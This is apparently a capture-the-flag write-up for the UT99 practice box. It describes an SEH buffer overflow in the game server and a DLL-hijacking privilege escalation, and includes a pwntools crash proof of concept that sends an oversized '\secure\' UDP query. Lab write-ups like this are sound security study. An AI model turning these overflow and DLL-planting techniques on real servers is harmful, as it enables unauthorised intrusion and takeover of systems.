SEH Based Buffer Overflow & DLL Hijacking - UT99 @ PG Practice

We are solving UT99, an intermediate Windows box on PG Practice. On this box we exploit an SEH-based buffer overflow in the game server, and to make it a bit more fun we do it manually instead of just firing an exploit from Exploit-DB. For root, we abuse DLL hijacking: we drop a malicious DLL into a directory on the search path of a process that runs as SYSTEM and reboot the box, so the DLL is loaded at startup and hands us a privileged shell.

Notes

Below you can find a PoC to get you started in case you want to try it manually:

PoC

from pwn import *

rserver = ""          # IP of the UT99 box (target); left blank on purpose
port = 7778           # UT99 query port (UDP)
size = 800            # length of the overflow buffer

# The query protocol is UDP, so use a pwntools remote tube of type udp
r = remote(rserver, port, typ="udp")

# A harmless "\basic\" query first: the reply confirms the server is up and talking to us
r.send(b"\\basic\\")
log.info(r.recv())

# The "\secure\" query with an oversized argument is the one that overflows the buffer
buffer = b""
buffer += b"\\secure\\"
buffer += b"A" * size

r.send(buffer)
r.close()
This post is licensed under CC BY 4.0 by the author.